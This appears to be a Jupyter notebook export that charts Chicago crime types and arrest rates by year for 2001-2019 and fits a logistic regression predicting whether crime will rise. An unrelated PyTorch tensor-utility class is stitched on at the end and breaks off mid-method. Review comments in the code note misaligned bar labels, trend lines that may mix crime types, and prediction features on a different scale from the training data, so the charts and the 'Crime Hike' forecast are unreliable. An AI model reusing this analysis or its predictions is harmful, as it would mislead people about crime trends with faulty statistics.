plt.title("Crime Scenario of 2007 Max: {}={}".format(c07u[:8][0],c07val[:8][0]),fontsize=20,color='m')
plt.xlabel("Crime Type->",fontsize=15,color='b')
plt.ylabel("Crime Occured->",fontsize=15,color='b')
plt.grid()
plt.bar(c07u[:8],c07val[:8],color=color,width=0.5)
# ### 2008
# In[106]:
# 2008-2011 come from the c0811smooth frame.
c08=c0811smooth[c0811smooth['Year']==2008]
c08=c08[c08.columns.tolist()[1:]]
c08.head()
c08arr=np.array(c08['Primary Type'])
c08u=np.unique(c08arr)
c08key=np.unique(np.array(np.array(c08['Primary Type'])))
c08val=np.array(c08['Primary Type'].value_counts().values)
print(c08u[:8])
print(c08val[:8])
color='cmykrgb'
plt.figure(figsize=(20,7))
plt.title("Crime Scenario of 2008 Max: {}={}".format(c08u[:8][0],c08val[:8][0]),fontsize=20,color='m')
plt.xlabel("Crime Type->",fontsize=15,color='b')
plt.ylabel("Crime Occured->",fontsize=15,color='b')
plt.grid()
plt.bar(c08u[:8],c08val[:8],color=color,width=0.5)
c08.head()
# ### 2009
# In[32]:
c09=c0811smooth[c0811smooth['Year']==2009]
c09=c09[c09.columns.tolist()[1:]]
c09.head()
c09arr=np.array(c09['Primary Type'])
c09u=np.unique(c09arr)
c09key=np.unique(np.array(np.array(c09['Primary Type'])))
c09val=np.array(c09['Primary Type'].value_counts().values)
print(c09u[:8])
print(c09val[:8])
color='cmykrgb'
plt.figure(figsize=(20,7))
plt.title("Crime Scenario of 2009 Max: {}={}".format(c09u[:8][0],c09val[:8][0]),fontsize=20,color='m')
plt.xlabel("Crime Type->",fontsize=15,color='b')
plt.ylabel("Crime Occured->",fontsize=15,color='b')
plt.grid()
plt.bar(c09u[:8],c09val[:8],color=color,width=0.5)
# ### 2010
# In[33]:
c10=c0811smooth[c0811smooth['Year']==2010]
c10=c10[c10.columns.tolist()[1:]]
c10.head()
c10arr=np.array(c10['Primary Type'])
c10u=np.unique(c10arr)
c10key=np.unique(np.array(np.array(c10['Primary Type'])))
c10val=np.array(c10['Primary Type'].value_counts().values)
print(c10u[:8])
print(c10val[:8])
color='cmykrgb'
plt.figure(figsize=(20,7))
plt.title("Crime Scenario of 2010 Max: {}={}".format(c10u[:8][0],c10val[:8][0]),fontsize=20,color='m')
plt.xlabel("Crime Type->",fontsize=15,color='b')
plt.ylabel("Crime Occured->",fontsize=15,color='b')
plt.grid()
plt.bar(c10u[:8],c10val[:8],color=color,width=0.5)
# ### 2011
# In[34]:
c11=c0811smooth[c0811smooth['Year']==2011]
c11=c11[c11.columns.tolist()[1:]]
c11.head()
c11arr=np.array(c11['Primary Type'])
c11u=np.unique(c11arr)
c11key=np.unique(np.array(np.array(c11['Primary Type'])))
c11val=np.array(c11['Primary Type'].value_counts().values)
print(c11u[:8])
print(c11val[:8])
color='cmykrgb'
plt.figure(figsize=(20,7))
plt.title("Crime Scenario of 2011 Max: {}={}".format(c11u[:8][0],c11val[:8][0]),fontsize=20,color='m')
plt.xlabel("Crime Type->",fontsize=15,color='b')
plt.ylabel("Crime Occured->",fontsize=15,color='b')
plt.grid()
plt.bar(c11u[:8],c11val[:8],color=color,width=0.5)
# ### 2012
# In[35]:
# 2012-2016 come from the c1217smooth frame.
c12=c1217smooth[c1217smooth['Year']==2012]
c12=c12[c12.columns.tolist()[1:]]
c12.head()
c12arr=np.array(c12['Primary Type'])
c12u=np.unique(c12arr)
c12key=np.unique(np.array(np.array(c12['Primary Type'])))
c12val=np.array(c12['Primary Type'].value_counts().values)
print(c12u[:8])
print(c12val[:8])
color='cmykrgb'
plt.figure(figsize=(20,7))
plt.title("Crime Scenario of 2012 Max: {}={}".format(c12u[:8][0],c12val[:8][0]),fontsize=20,color='m')
plt.xlabel("Crime Type->",fontsize=15,color='b')
plt.ylabel("Crime Occured->",fontsize=15,color='b')
plt.grid()
plt.bar(c12u[:8],c12val[:8],color=color,width=0.5)
# ### 2013
# In[36]:
c13=c1217smooth[c1217smooth['Year']==2013]
c13=c13[c13.columns.tolist()[1:]]
c13.head()
c13arr=np.array(c13['Primary Type'])
c13u=np.unique(c13arr)
c13key=np.unique(np.array(np.array(c13['Primary Type'])))
c13val=np.array(c13['Primary Type'].value_counts().values)
print(c13u[:8])
print(c13val[:8])
color='cmykrgb'
plt.figure(figsize=(20,7))
plt.title("Crime Scenario of 2013 Max: {}={}".format(c13u[:8][0],c13val[:8][0]),fontsize=20,color='m')
plt.xlabel("Crime Type->",fontsize=15,color='b')
plt.ylabel("Crime Occured->",fontsize=15,color='b')
plt.grid()
plt.bar(c13u[:8],c13val[:8],color=color,width=0.5)
# ### 2014
# In[37]:
c14=c1217smooth[c1217smooth['Year']==2014]
c14=c14[c14.columns.tolist()[1:]]
c14.head()
c14arr=np.array(c14['Primary Type'])
c14u=np.unique(c14arr)
c14key=np.unique(np.array(np.array(c14['Primary Type'])))
c14val=np.array(c14['Primary Type'].value_counts().values)
print(c14u[:8])
print(c14val[:8])
color='cmykrgb'
plt.figure(figsize=(20,7))
plt.title("Crime Scenario of 2014 Max: {}={}".format(c14u[:8][0],c14val[:8][0]),fontsize=20,color='m')
plt.xlabel("Crime Type->",fontsize=15,color='b')
# --- 2014 (continued): finish the top-8 bar chart started above ---
plt.ylabel("Crime Occured->", fontsize=15, color='b')
plt.grid()
plt.bar(c14u[:8], c14val[:8], color=color, width=0.5)
# ### 2015
# In[38]:
# Per-year pattern: filter the source frame by Year, drop the first (index)
# column, derive unique crime-type labels and occurrence counts, plot top 8.
# NOTE(review): labels (np.unique, alphabetical) and counts (value_counts,
# descending) are ordered differently; kept as-is for consistency with the
# other year sections, but the bar labels are probably misaligned.
c15 = c1217smooth[c1217smooth['Year'] == 2015]
c15 = c15[c15.columns.tolist()[1:]]
c15.head()
c15arr = np.array(c15['Primary Type'])
c15u = np.unique(c15arr)                                   # unique crime types
c15key = np.unique(np.array(c15['Primary Type']))          # same as c15u (kept for parity with other cells)
c15val = np.array(c15['Primary Type'].value_counts().values)  # counts, descending
print(c15u[:8])
print(c15val[:8])
color = 'cmykrgb'
plt.figure(figsize=(20, 7))
plt.title("Crime Scenario of 2015 Max: {}={}".format(c15u[:8][0], c15val[:8][0]), fontsize=20, color='m')
plt.xlabel("Crime Type->", fontsize=15, color='b')
plt.ylabel("Crime Occured->", fontsize=15, color='b')
plt.grid()
plt.bar(c15u[:8], c15val[:8], color=color, width=0.5)
# ### 2016
# In[39]:
c16 = c1217smooth[c1217smooth['Year'] == 2016]
c16 = c16[c16.columns.tolist()[1:]]
c16.head()
c16arr = np.array(c16['Primary Type'])
c16u = np.unique(c16arr)
c16key = np.unique(np.array(c16['Primary Type']))
c16val = np.array(c16['Primary Type'].value_counts().values)
print(c16u[:8])
print(c16val[:8])
color = 'cmykrgb'
plt.figure(figsize=(20, 7))
plt.title("Crime Scenario of 2016 Max: {}={}".format(c16u[:8][0], c16val[:8][0]), fontsize=20, color='m')
# Label fontsize normalized to 15 (was 16 — the year number had been pasted
# into the fontsize argument).
plt.xlabel("Crime Type->", fontsize=15, color='b')
plt.ylabel("Crime Occured->", fontsize=15, color='b')
plt.grid()
plt.bar(c16u[:8], c16val[:8], color=color, width=0.5)
# ### 2017
# In[40]:
# BUG FIX: this cell previously selected c0811smooth[Year == 2009], so the
# chart titled "2017" actually showed 2009 data. 2017 rows live in the c1719
# frame — the arrest analysis below already uses c1719[c1719['Year']==2017].
c17 = c1719[c1719['Year'] == 2017]
c17 = c17[c17.columns.tolist()[1:]]
c17.head()
c17arr = np.array(c17['Primary Type'])
c17u = np.unique(c17arr)
c17key = np.unique(np.array(c17['Primary Type']))
c17val = np.array(c17['Primary Type'].value_counts().values)
print(c17u[:8])
print(c17val[:8])
color = 'cmykrgb'
plt.figure(figsize=(20, 7))
plt.title("Crime Scenario of 2017 Max: {}={}".format(c17u[:8][0], c17val[:8][0]), fontsize=20, color='m')
# Label fontsize normalized to 15 (was 17 — year pasted into fontsize).
plt.xlabel("Crime Type->", fontsize=15, color='b')
plt.ylabel("Crime Occured->", fontsize=15, color='b')
plt.grid()
# Finish the 2017 top-8 bar chart, then a full horizontal chart of all types.
plt.bar(c17u[:8],c17val[:8],color=color,width=0.5)
plt.figure(figsize=(18,10))
plt.title("Crime Scenario of 2017",fontsize=20,color='m')
plt.ylabel("Crime Type->",fontsize=17,color='b')
plt.xlabel("Crime Occured->",fontsize=17,color='b')
plt.grid()
plt.barh(c17u,c17val)
#c17.groupby('Primary Type')['Arrest'].count()
# ### 2018
# In[41]:
# 2018 and 2019 come from the c1719 frame.
c18=c1719[c1719['Year']==2018]
c18=c18[c18.columns.tolist()[1:]]  # drop first column
c18.head()
c18arr=np.array(c18['Primary Type'])
c18u=np.unique(c18arr)  # unique crime types, alphabetical
c18key=np.unique(np.array(np.array(c18['Primary Type'])))
c18val=np.array(c18['Primary Type'].value_counts().values)  # counts, descending
print(c18u[:8])
print(c18val[:8])
color='cmykrgb'
plt.figure(figsize=(28,7))
plt.title("Crime Scenario of 2018 Max: {}={}".format(c18u[:8][0],c18val[:8][0]),fontsize=20,color='m')
plt.xlabel("Crime Type->",fontsize=18,color='b')
plt.ylabel("Crime Occured->",fontsize=18,color='b')
plt.grid()
plt.bar(c18u[:8],c18val[:8],color=color,width=0.5)
plt.figure(figsize=(18,10))
plt.title("Crime Scenario of 2018",fontsize=20,color='m')
plt.ylabel("Crime Type->",fontsize=17,color='b')
plt.xlabel("Crime Occured->",fontsize=17,color='b')
plt.grid()
plt.barh(c18u,c18val)
c18.head()
# ### 2019
# In[42]:
c19=c1719[c1719['Year']==2019]
c19=c19[c19.columns.tolist()[1:]]
c19.head()
c19arr=np.array(c19['Primary Type'])
c19u=np.unique(c19arr)
c19key=np.unique(np.array(np.array(c19['Primary Type'])))
c19val=np.array(c19['Primary Type'].value_counts().values)
print(c19u[:8])
print(c19val[:8])
color='cmykrgb'
plt.figure(figsize=(28,7))
plt.title("Crime Scenario of 2019 Max: {}={}".format(c19u[:8][0],c19val[:8][0]),fontsize=20,color='m')
plt.xlabel("Crime Type->",fontsize=19,color='b')
plt.ylabel("Crime Occured->",fontsize=19,color='b')
plt.grid()
plt.bar(c19u[:8],c19val[:8],color=color,width=0.5)
plt.figure(figsize=(18,10))
plt.title("Crime Scenario of 2019",fontsize=20,color='m')
plt.ylabel("Crime Type->",fontsize=17,color='b')
plt.xlabel("Crime Occured->",fontsize=17,color='b')
plt.grid()
plt.barh(c19u,c19val)
# In[43]:
# Year-over-year trend of the single largest count per year (2012-2019).
crmyr=['2019','2018','2017','2016','2015','2014','2013','2012']
crm=[c19val[:8][0],c18val[:8][0],c17val[:8][0],c16val[:8][0],c15val[:8][0],c14val[:8][0],c13val[:8][0],c12val[:8][0]]
# In[48]:
# One trend chart per top-8 crime type of 2019, saved to disk.
# NOTE(review): "Directory Location" is a literal placeholder — savefig will
# write files literally named "Directory Location<TYPE>_graph" in the cwd;
# replace with a real output directory.
# NOTE(review): crm pairs the i-th count of each year, but each year's values
# are ordered by that year's own value_counts — the i-th slot may not be the
# same crime type across years; verify.
for i in range(len(c19u[:8])):
    plt.figure(figsize=(10,5))
    crmyr=['2019','2018','2017','2016','2015','2014','2013','2012']
    crm=[c19val[:8][i],c18val[:8][i],c17val[:8][i],c16val[:8][i],c15val[:8][i],c14val[:8][i],c13val[:8][i],c12val[:8][i]]
    plt.title("{} Crime Rate".format(c19u[:8][i]),fontsize=20,color="m")
    plt.xlabel("Year->",fontsize=13,color="b")
    plt.ylabel("Count of Crime",fontsize=13,color="b")
    plt.grid()
    plt.plot(crmyr[::-1],crm[::-1],"g")
    plt.plot(crmyr[::-1],crm[::-1],"Dr")
    plt.savefig("Directory Location"+c19u[:8][i]+"_graph")
# ## Comparative analysis of 19 years
# #### Arrest
# In[52]:
# Arrest flag distribution over the 2001-2004 frame.
# NOTE(review): np.unique sorts [False, True], so c0104arstu[0] is False —
# cntt0104 therefore counts the *False* (not arrested) rows despite its name;
# confirm before relying on the t/f suffixes.
c0104arst=np.array(c0104['Arrest'])
c0104arstu=np.unique(c0104arst)
print(c0104arstu)
c0104arst=c0104arst.tolist()
#print(c19arst)
cntt0104=c0104arst.count(c0104arstu[0])
cntf0104=c0104arst.count(c0104arstu[1])
cnt0104=[cntt0104,cntf0104]
print(cnt0104)
# In[78]:
# Accumulators filled year by year below:
# arrst     - count of Arrest==False per year (groupby sorts False first)
# arrstratf - percentage not arrested per year
# arrstratt - percentage arrested per year
arrst=[]
arrstratf=[]
arrstratt=[]
# #### Arrest in 2001
# In[79]:
c01arrststs=c01.groupby(['Arrest']).count()['Case Number'].keys().tolist()
c01arrstcnt=c01.groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c01arrststs)
print(c01arrstcnt)
# In[80]:
arrst.append(c01arrstcnt[0])
arrstratf.append((c01arrstcnt[0]/sum(c01arrstcnt))*100)
arrstratt.append((c01arrstcnt[1]/sum(c01arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2002
# In[82]:
c02arrststs=c02.groupby(['Arrest']).count()['Case Number'].keys().tolist()
c02arrstcnt=c02.groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c02arrststs)
print(c02arrstcnt)
# In[83]:
arrst.append(c02arrstcnt[0])
arrstratf.append((c02arrstcnt[0]/sum(c02arrstcnt))*100)
arrstratt.append((c02arrstcnt[1]/sum(c02arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2003
# In[84]:
# --- Arrest counts per year, 2003-2019 (same pattern as 2001/2002 above). ---
# For each year: groupby('Arrest').count() on 'Case Number' yields
# [False-count, True-count] (groupby sorts keys), then append the
# not-arrested count and both percentages to the running lists.
c03arrststs=c03.groupby(['Arrest']).count()['Case Number'].keys().tolist()
c03arrstcnt=c03.groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c03arrststs)
print(c03arrstcnt)
# In[85]:
arrst.append(c03arrstcnt[0])
arrstratf.append((c03arrstcnt[0]/sum(c03arrstcnt))*100)
arrstratt.append((c03arrstcnt[1]/sum(c03arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2004
# In[88]:
c04arrststs=c04.groupby(['Arrest']).count()['Case Number'].keys().tolist()
c04arrstcnt=c04.groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c04arrststs)
print(c04arrstcnt)
# In[89]:
arrst.append(c04arrstcnt[0])
arrstratf.append((c04arrstcnt[0]/sum(c04arrstcnt))*100)
arrstratt.append((c04arrstcnt[1]/sum(c04arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2005
# In[90]:
c05arrststs=c05.groupby(['Arrest']).count()['Case Number'].keys().tolist()
c05arrstcnt=c05.groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c05arrststs)
print(c05arrstcnt)
# In[91]:
arrst.append(c05arrstcnt[0])
arrstratf.append((c05arrstcnt[0]/sum(c05arrstcnt))*100)
arrstratt.append((c05arrstcnt[1]/sum(c05arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2006
# In[92]:
c06arrststs=c06.groupby(['Arrest']).count()['Case Number'].keys().tolist()
c06arrstcnt=c06.groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c06arrststs)
print(c06arrstcnt)
# In[93]:
arrst.append(c06arrstcnt[0])
arrstratf.append((c06arrstcnt[0]/sum(c06arrstcnt))*100)
arrstratt.append((c06arrstcnt[1]/sum(c06arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2007
# In[94]:
c07arrststs=c07.groupby(['Arrest']).count()['Case Number'].keys().tolist()
c07arrstcnt=c07.groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c07arrststs)
print(c07arrstcnt)
# In[95]:
arrst.append(c07arrstcnt[0])
arrstratf.append((c07arrstcnt[0]/sum(c07arrstcnt))*100)
arrstratt.append((c07arrstcnt[1]/sum(c07arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2008
# In[103]:
c08.columns.tolist()
# In[109]:
# 2008-2011 are filtered from the raw c0811 frame instead of per-year frames.
c08arrststs=c0811[c0811['Year']==2008].groupby(['Arrest']).count()['Case Number'].keys().tolist()
c08arrstcnt=c0811[c0811['Year']==2008].groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c08arrststs)
print(c08arrstcnt)
# In[110]:
arrst.append(c08arrstcnt[0])
arrstratf.append((c08arrstcnt[0]/sum(c08arrstcnt))*100)
arrstratt.append((c08arrstcnt[1]/sum(c08arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2009
# In[111]:
c09arrststs=c0811[c0811['Year']==2009].groupby(['Arrest']).count()['Case Number'].keys().tolist()
c09arrstcnt=c0811[c0811['Year']==2009].groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c09arrststs)
print(c09arrstcnt)
# In[112]:
arrst.append(c09arrstcnt[0])
arrstratf.append((c09arrstcnt[0]/sum(c09arrstcnt))*100)
arrstratt.append((c09arrstcnt[1]/sum(c09arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2010
# In[113]:
c10arrststs=c0811[c0811['Year']==2010].groupby(['Arrest']).count()['Case Number'].keys().tolist()
c10arrstcnt=c0811[c0811['Year']==2010].groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c10arrststs)
print(c10arrstcnt)
# In[114]:
arrst.append(c10arrstcnt[0])
arrstratf.append((c10arrstcnt[0]/sum(c10arrstcnt))*100)
arrstratt.append((c10arrstcnt[1]/sum(c10arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2011
# In[115]:
c11arrststs=c0811[c0811['Year']==2011].groupby(['Arrest']).count()['Case Number'].keys().tolist()
c11arrstcnt=c0811[c0811['Year']==2011].groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c11arrststs)
print(c11arrstcnt)
# In[116]:
arrst.append(c11arrstcnt[0])
arrstratf.append((c11arrstcnt[0]/sum(c11arrstcnt))*100)
arrstratt.append((c11arrstcnt[1]/sum(c11arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2012
# In[117]:
# 2012-2016 are filtered from the raw c1217 frame.
c12arrststs=c1217[c1217['Year']==2012].groupby(['Arrest']).count()['Case Number'].keys().tolist()
c12arrstcnt=c1217[c1217['Year']==2012].groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c12arrststs)
print(c12arrstcnt)
# In[118]:
arrst.append(c12arrstcnt[0])
arrstratf.append((c12arrstcnt[0]/sum(c12arrstcnt))*100)
arrstratt.append((c12arrstcnt[1]/sum(c12arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2013
# In[119]:
c13arrststs=c1217[c1217['Year']==2013].groupby(['Arrest']).count()['Case Number'].keys().tolist()
c13arrstcnt=c1217[c1217['Year']==2013].groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c13arrststs)
print(c13arrstcnt)
# In[120]:
arrst.append(c13arrstcnt[0])
arrstratf.append((c13arrstcnt[0]/sum(c13arrstcnt))*100)
arrstratt.append((c13arrstcnt[1]/sum(c13arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2014
# In[121]:
c14arrststs=c1217[c1217['Year']==2014].groupby(['Arrest']).count()['Case Number'].keys().tolist()
c14arrstcnt=c1217[c1217['Year']==2014].groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c14arrststs)
print(c14arrstcnt)
# In[122]:
arrst.append(c14arrstcnt[0])
arrstratf.append((c14arrstcnt[0]/sum(c14arrstcnt))*100)
arrstratt.append((c14arrstcnt[1]/sum(c14arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2015
# In[123]:
c15arrststs=c1217[c1217['Year']==2015].groupby(['Arrest']).count()['Case Number'].keys().tolist()
c15arrstcnt=c1217[c1217['Year']==2015].groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c15arrststs)
print(c15arrstcnt)
# In[124]:
arrst.append(c15arrstcnt[0])
arrstratf.append((c15arrstcnt[0]/sum(c15arrstcnt))*100)
arrstratt.append((c15arrstcnt[1]/sum(c15arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2016
# In[125]:
c16arrststs=c1217[c1217['Year']==2016].groupby(['Arrest']).count()['Case Number'].keys().tolist()
c16arrstcnt=c1217[c1217['Year']==2016].groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c16arrststs)
print(c16arrstcnt)
# In[126]:
arrst.append(c16arrstcnt[0])
arrstratf.append((c16arrstcnt[0]/sum(c16arrstcnt))*100)
arrstratt.append((c16arrstcnt[1]/sum(c16arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2017
# In[129]:
# 2017-2019 are filtered from the raw c1719 frame.
c17arrststs=c1719[c1719['Year']==2017].groupby(['Arrest']).count()['Case Number'].keys().tolist()
c17arrstcnt=c1719[c1719['Year']==2017].groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c17arrststs)
print(c17arrstcnt)
# In[130]:
arrst.append(c17arrstcnt[0])
arrstratf.append((c17arrstcnt[0]/sum(c17arrstcnt))*100)
arrstratt.append((c17arrstcnt[1]/sum(c17arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2018
# In[131]:
c18arrststs=c1719[c1719['Year']==2018].groupby(['Arrest']).count()['Case Number'].keys().tolist()
c18arrstcnt=c1719[c1719['Year']==2018].groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c18arrststs)
print(c18arrstcnt)
# In[132]:
arrst.append(c18arrstcnt[0])
arrstratf.append((c18arrstcnt[0]/sum(c18arrstcnt))*100)
arrstratt.append((c18arrstcnt[1]/sum(c18arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# #### Arrest in 2019
# In[133]:
c19arrststs=c1719[c1719['Year']==2019].groupby(['Arrest']).count()['Case Number'].keys().tolist()
c19arrstcnt=c1719[c1719['Year']==2019].groupby(['Arrest']).count()['Case Number'].values.tolist()
print(c19arrststs)
print(c19arrstcnt)
# In[134]:
arrst.append(c19arrstcnt[0])
arrstratf.append((c19arrstcnt[0]/sum(c19arrstcnt))*100)
arrstratt.append((c19arrstcnt[1]/sum(c19arrstcnt))*100)
print(arrst)
print(arrstratf)
print(arrstratt)
# In[135]:
# Sanity check: one entry per year, 2001-2019 (19 each).
print(len(arrst))
print(len(arrstratf))
print(len(arrstratt))
# In[141]:
yearlist=[str(i) for i in range(2001,2020)]
print(yearlist)
# In[157]:
plt.figure(figsize=(15,6))
plt.title("Crime Arrest Report",fontsize=20,color='m')
# Line chart of arrested vs not-arrested percentage, 2001-2019.
plt.xlabel("Year->",fontsize=15,color='b')
plt.ylabel("Arrest percentage->",fontsize=15,color='b')
plt.plot(arrstratt,"k",label="Arrested")
plt.plot(arrstratt,"Pk")
plt.plot(arrstratf,"r",label="Not Arrested")
plt.plot(arrstratf,"Dr")
plt.legend(loc="upper right")
# In[158]:
# NOTE(review): arrst holds the *not arrested* counts (index 0 of the
# groupby result) despite the chart title; confirm intent.
plt.figure(figsize=(15,6))
plt.title("Crime Arrest Report Yearwise",fontsize=20,color='m')
plt.xlabel("Year->",fontsize=15,color='b')
plt.ylabel("Arrest percentage->",fontsize=15,color='b')
plt.bar(yearlist,arrst,color="crmgybk")
# In[165]:
# Arrested counts per year (index 1 = Arrest==True).
arrsted=[c01arrstcnt[1],c02arrstcnt[1],c03arrstcnt[1],c04arrstcnt[1],c05arrstcnt[1],c06arrstcnt[1],c07arrstcnt[1],c08arrstcnt[1],c09arrstcnt[1],c10arrstcnt[1],c11arrstcnt[1],c12arrstcnt[1],c13arrstcnt[1],c14arrstcnt[1],c15arrstcnt[1],c16arrstcnt[1],c17arrstcnt[1],c18arrstcnt[1],c19arrstcnt[1]]
print(len(arrsted))
# In[173]:
# prob[i] = 1 when the arrest percentage rose versus the previous year
# (used later as the "Crime Hike" target column).
prob=[]
pres=arrstratt[0]
for i in range(len(arrstratt)):
    if pres>=arrstratt[i]:
        prob.append(0)
    else:
        prob.append(1)
    pres=arrstratt[i]
print(prob)
# In[193]:
# ratio = arrested / total booked per year ("efficiency ratio").
ratio=[]
for i in range(len(arrstratt)):
    ratio.append(arrsted[i]/(arrst[i]+arrsted[i]))
print(ratio)
# In[194]:
regdata=pd.DataFrame({
    "Year":yearlist,
    "Case Booked":np.array(arrst)+np.array(arrsted),
    "Not Arrested":arrst,
    "Arrested":arrsted,
    "Arrested(%)":arrstratt,
    "Not Arrested(%)":arrstratf,
    "Efficiency Ratio":ratio,
    "Crime Hike":prob
})
# NOTE(review): hardcoded machine-specific Windows path — parameterize before reuse.
regdata.to_csv("C:/Users/maiti/OneDrive/Desktop/crimes-in-chicago/regdata.csv")
# In[188]:
from sklearn.datasets import load_iris  # NOTE(review): unused import
from sklearn.linear_model import LogisticRegression
# Fit on columns 1..-2 (Case Booked .. Efficiency Ratio), target = last
# column "Crime Hike".
logmodel = LogisticRegression()
logmodel.fit(regdata[regdata.columns.tolist()[1:len(regdata.columns.tolist())-1]],regdata[regdata.columns.tolist()[-1]])
# In[189]:
regdata.columns.tolist()
# In[197]:
# Build one feature row from the user-supplied booked-case count and the mean
# efficiency ratio.
# NOTE(review): the 4th/5th features reduce to meanrat and 1-meanrat (fractions),
# while training used percentage columns (0-100) in those positions — the
# feature scales look inconsistent; verify.
bookcase=int(input("Enter Probable Book Case number: "))
meanrat=np.mean(np.array(regdata['Efficiency Ratio']))
predict_crime=logmodel.predict([[bookcase,bookcase-bookcase*meanrat,bookcase*meanrat,bookcase*meanrat/bookcase,bookcase-(bookcase*meanrat/bookcase),meanrat]])
print(predict_crime[0])
# In[198]:
if predict_crime[0]==0:
    print("Crime in Chicago will be Decreased...")
else:
    print("Crime in Chicago will be Increased...")
# In[195]:
regdata.head()
# In[168]:
regdata.corr()
# In[124]:
# Seaborn count plots of the Arrest flag, 2019 back to 2009.
plt.figure(figsize=(8,6))
plt.title("Arrest in 2019")
sns.countplot(c19['Arrest'])
# In[125]:
plt.figure(figsize=(8,6))
plt.title("Arrest in 2018")
sns.countplot(c18['Arrest'])
# In[126]:
plt.figure(figsize=(8,6))
plt.title("Arrest in 2017")
sns.countplot(c17['Arrest'])
# In[127]:
plt.figure(figsize=(8,6))
plt.title("Arrest in 2016")
sns.countplot(c16['Arrest'])
# In[128]:
plt.figure(figsize=(8,6))
plt.title("Arrest in 2015")
sns.countplot(c15['Arrest'])
# In[129]:
plt.figure(figsize=(8,6))
plt.title("Arrest in 2014")
sns.countplot(c14['Arrest'])
# In[130]:
plt.figure(figsize=(8,6))
plt.title("Arrest in 2013")
sns.countplot(c13['Arrest'])
# In[131]:
plt.figure(figsize=(8,6))
plt.title("Arrest in 2012")
sns.countplot(c12['Arrest'])
# In[132]:
plt.figure(figsize=(8,6))
plt.title("Arrest in 2011")
sns.countplot(c11['Arrest'])
# In[133]:
plt.figure(figsize=(8,6))
plt.title("Arrest in 2010")
sns.countplot(c10['Arrest'])
# In[134]:
plt.figure(figsize=(8,6))
plt.title("Arrest in 2009")
sns.countplot(c09['Arrest'])
# ## Primary Type with Arrest
# In[135]:
# Per-crime-type record counts, 2019 back to 2009 (display-only cells).
np.array(c19.groupby('Primary Type')['Arrest'].count())
# In[136]:
np.array(c18.groupby('Primary Type')['Arrest'].count())
# In[137]:
np.array(c17.groupby('Primary Type')['Arrest'].count())
# In[138]:
np.array(c16.groupby('Primary Type')['Arrest'].count())
# In[139]:
np.array(c15.groupby('Primary Type')['Arrest'].count())
# In[140]:
np.array(c14.groupby('Primary Type')['Arrest'].count())
# In[141]:
np.array(c13.groupby('Primary Type')['Arrest'].count())
# In[142]:
np.array(c12.groupby('Primary Type')['Arrest'].count())
# In[143]:
np.array(c11.groupby('Primary Type')['Arrest'].count())
# In[144]:
np.array(c10.groupby('Primary Type')['Arrest'].count())
# In[145]:
np.array(c09.groupby('Primary Type')['Arrest'].count())
# In[ ]:
# In[146]:
# Correlation heatmaps over the geographic/administrative numeric columns.
c19num=c19[['Beat','District','Ward','Community Area']]
sns.heatmap(c19num.corr(),annot=True)
# In[147]:
c18num=c18[['Beat','District','Ward','Community Area']]
sns.heatmap(c18num.corr(),annot=True)
# In[148]:
c01num=c01[['Beat','District']]
sns.heatmap(c01num.corr(),annot=True)
# In[158]:
# NOTE(review): `link` is defined in an earlier (unseen) cell — presumably an
# output directory prefix; verify before running this cell in isolation.
c19.corr().to_csv(link+"corr.csv")
# In[149]:
plt.figure(figsize=(15,15))
sns.heatmap(c19.corr(),annot=True)
# In[168]:
c18.head()
# In[155]:
c19['Latitude'].iloc[0]
# In[ ]:
# In[ ]:
import torch

__author__ = "<NAME>"
__copyright__ = "Copyright 2019, <NAME>"
__credits__ = ["<NAME>"]
__license__ = "Apache License 2.0"


class TensorUtils:
    """Static helper and debugging utilities for torch tensors."""

    @staticmethod
    def tensors_are_equal(tensor_one, tensor_two):
        """Return True when the two tensors are element-wise equal.

        https://stackoverflow.com/questions/32996281/how-to-check-if-two-torch-tensors-or-matrices-are-equal
        https://discuss.pytorch.org/t/tensor-math-logical-operations-any-and-all-functions/6624
        """
        # bool(...) converts the 0-dim result tensor to a plain Python bool,
        # so callers get True/False instead of tensor(True)/tensor(False).
        return bool(torch.eq(tensor_one, tensor_two).all())

    # Debugging method that checks that two lists of (3-dimensional)
    # tensors are equal, visualizing the first pair of tensors it
    # encounters that is not equal, if there is one
    @staticmethod
    def tensors_lists_are_equal(tensor_list_one, tensor_list_two):
